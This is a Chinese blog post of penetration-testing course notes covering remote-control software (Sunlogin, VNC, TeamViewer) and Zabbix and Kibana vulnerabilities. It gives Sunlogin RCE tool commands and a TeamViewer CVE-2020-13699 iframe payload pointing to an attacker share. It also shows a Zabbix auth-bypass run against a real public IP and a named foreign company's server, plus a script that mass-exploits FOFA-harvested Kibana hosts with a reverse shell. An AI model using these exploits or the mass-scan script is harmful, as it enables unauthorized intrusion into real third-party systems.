【小迪安全2023】第58天:服务攻防-应用协议设备KibanaZabbix远控向日葵VNCTV

news2024/11/21 0:15:03

🍬 博主介绍

👨‍🎓 博主介绍：大家好，我是 hacker-routing ，很高兴认识大家~
✨主攻领域：【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限，欢迎各位大佬指点，相互学习进步！

大纲

知识点：

一、远程控制-向日葵&Vnc&Teamviewe

二、设备平台-Zabbix-CVE-2022-23131

0x1 前言

0x2 漏洞影响

0x3 漏洞复现

三、CVE-2019-7609：Kibana远程代码执行漏洞复现

0x1简介

0x2 漏洞概述

0x3 影响版本

0x4 漏洞复现:

大纲

知识点：

1、远程控制-第三方应用安全

2、三方应用-向日葵&VNC&TV

3、设备平台-Zabbix&Kibana漏洞

#章节内容：
常见服务应用的安全测试：
1、配置不当-未授权访问
2、安全机制-特定安全漏洞
3、安全机制-弱口令爆破攻击
 
#前置知识：
应用服务安全测试流程：见图
1、判断服务开放情况-端口扫描&组合应用等
2、判断服务类型归属-数据库&文件传输&通讯等
3、判断服务利用方式-特定漏洞&未授权&弱口令等

一、远程控制-向日葵&Vnc&Teamviewe

1、下面这个是存在远程命令执行漏洞的向日葵：

GitHub - Mr-xn/sunlogin_rce: 向日葵 RCE

2、这个是远程命令执行的工具：

GitHub - Fheidt12/XRK-RCE: 向日葵远程命令执行漏洞

xrkRce.exe -h 192.168.233.140 -t scan
xrkRce.exe -h 192.168.233.140 -t rce -p 49516 -c "ipconfig"

Vnc

在使用的过程中有两个问题：
在security中有设置选项，这个就是设置安全的。
如果设置为none，则就不需要密码就可以直接连接这个主机
 
安全中有几种模式：Windows password，VNC password，None

用客户端去连接这台主机，并不用输入账号密码，就可以直接连接
 
也可在fofa中搜：app="VNC"&port="5900"
 
这个密码是可以参加的，在hydra中是支持这个vnc猜解的。没有账号。

Teamviewe

这个类似于网站钓鱼，需要管理员访问特定的地址（我们构造的）
 
构造的html代码：
<!DOCTYPE html>
<html>
<head>
    <title>cve-2020-13699</title>
</head>
<body>
    <p>Welcome to xiaodi!</p>
    <iframe style="height:1px;width:1px;" src='teamviewer10: --play \\attacker-IP\share\fake.tvs'></iframe>
</body>
</html>
 
 
当管理员去访问：http://192.168.233.1:8081/web/test.html
这个时候就会自动运行这个软件。
 
teamviewer10: --play \\attacker-IP\share\fake.tvs是执行命令，如果要执行什么就可以进行修改完成测试。

二、设备平台-Zabbix-CVE-2022-23131

0x1 前言

zabbix的漏洞（CVE-2022-23131），偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA（Zabbix Sia）公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞，该漏洞源于在启用 SAML SSO 身份验证（非默认）的情况下，恶意行为者可以修改会话数据，因为存储在会话中的用户登录未经过验证。未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。

0x2 漏洞影响

5.4.8

5.0.18

4.0.36

默认端口：10051

漏洞复现参考文章：

Zabbix登录绕过漏洞复现（CVE-2022-23131）-阿里云开发者社区

0x3 漏洞复现

FOFA检索：app="ZABBIX-监控系统" && body="saml"

自动化脚本工具如下：

┌──(root💀kali)-[~/桌面/cve-2022-23131-main]
└─# python3 cve-2022-23131.py http://20.16.77.158 Admin  

decode_payload: {"saml_data": {"username_attribute": "Admin"}, "sessionid": "9dba05c99b9dd5cd2c6b6915f8732f63", "sign": "58b5d6ee7d6597f1b275026c1b5b089ddde803403f93a053db0bcf372342a8a7"}
zbx_signed_session: eyJzYW1sX2RhdGEiOiB7InVzZXJuYW1lX2F0dHJpYnV0ZSI6ICJBZG1pbiJ9LCAic2Vzc2lvbmlkIjogIjlkYmEwNWM5OWI5ZGQ1Y2QyYzZiNjkxNWY4NzMyZjYzIiwgInNpZ24iOiAiNThiNWQ2ZWU3ZDY1OTdmMWIyNzUwMjZjMWI1YjA4OWRkZGU4MDM0MDNmOTNhMDUzZGIwYmNmMzcyMzQyYThhNyJ9

GitHub - L0ading-x/cve-2022-23131: cve-2022-23131

修改cookie值，然后点击SAML，就可以进入这个监控系统了

https://scan.ibt.uk.com/zabbix.php?action=dashboard.list

三、CVE-2019-7609：Kibana远程代码执行漏洞复现

0x1简介

Kibana 是为 Elasticsearch设计的开源分析和可视化平台。你可以使用 Kibana 来搜索，查看存储在 Elasticsearch 索引中的数据并与之交互。你可以很容易实现高级的数据分析和可视化，以图标的形式展现出来。

默认端口:5601

0x2 漏洞概述

攻击者利用漏洞可以通过Timelion组件中的JavaScript原型链污染攻击，向Kibana发起相关请求，从而接管所在服务器，在服务器上执行任意命令。

0x3 影响版本

Kibana < 6.6.1

Kibana < 5.6.15

0x4 漏洞复现:

CVE-2019-7609：Kibana远程代码执行漏洞复现-腾讯云开发者社区-腾讯云

漏洞自动化脚本工具：

GitHub - LandGrey/CVE-2019-7609: exploit CVE-2019-7609(kibana RCE) on right way by python2 scripts

FOFA检索语句：port="5601" && country="CN"

然后使用我们前一天讲的那个批量导出FOFA信息的工具，导出来然后保存为ips.txt，放在工具目录下

下面是可以进行批量扫描漏洞的python脚本，把这个脚本放在开始下载的那个CVE-2019-7609脚本工具文件夹下

import os
for ip in open('ips.txt'):
  ip=ip.strip()
  cmdline='python2 CVE-2019-7609-kibana-rce.py -u %s -host 10.10.10.128 -port 5566 --shell'%ip
  print(cmdline)
  os.system(cmdline)
  #print(ip)